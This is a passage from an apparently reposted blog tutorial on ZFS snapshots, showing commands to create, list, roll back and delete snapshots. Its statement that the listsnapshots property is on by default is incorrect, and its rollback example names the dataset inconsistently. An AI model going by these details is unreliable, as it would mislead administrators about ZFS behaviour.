zfs snapshot my_pool/my_data@snapshot_today
And there you go! You’ve captured a photograph of your dataset.
Ah, small detail. ZFS has a property called listsnapshots that controls whether you see the snapshots when you list your datasets. By default, it’s turned on, so you should see your snapshots without any issue. But if for some reason you can’t, someone might have turned off this property.
If you suspect something’s up, check the status with:
zpool get listsnapshots pool_name
To disable or enable snapshot visibility, use:
zpool set listsnapshots=off pool_name
Or:
zpool set listsnapshots=on pool_name
Let’s say you made a mistake (hey, it happens to the best of us) and you want to revert to an earlier state of your data. ZFS snapshots are here to save the day. You can access the data from any snapshot by navigating to the .zfs/snapshot/ directory within the original dataset. From there, either copy what you need or restore the entire dataset.
If you want to take things a step further and restore your entire dataset to the state of a previous snapshot, there’s a command for that: zfs rollback. Let’s say you have a dataset called home/matt and you want to return to the state of the snapshot named tuesday. Just do:
zfs rollback tank/home/matt@tuesday
This will bring everything back to how it was on that glorious Tuesday.
Spring Cleaning: Deleting Old Snapshots
As time goes by, you might accumulate a lot of snapshots. Some of them might not be needed anymore. To get rid of those old memories, use the command:
zfs destroy pool_name/dataset_name@snapshot_name
Yes, snapshots are great for recovering from mistakes, but there’s more to them. You can use them to test changes in a safe environment. If something goes wrong, just revert to the snapshot, and you’re good. They’re also excellent tools for backing up and replicating data to other systems.
ZFS snapshots aren’t just another feature. They’re a testament to the power and versatility of this file system. Now that you’re well-acquainted with them, I hope you’ll make the most out of them.
Migrating and cloning with snapshots, ensuring security and privacy, and the joys of automation await you in the world of ZFS. Dive in, create your snapshots, and discover all they can offer you.
Until our next tech adventure! Enjoy ZFS and harness its full potential!
La entrada Everything You Need to Know About ZFS Snapshots se publicó primero en Aprende IT.
]]>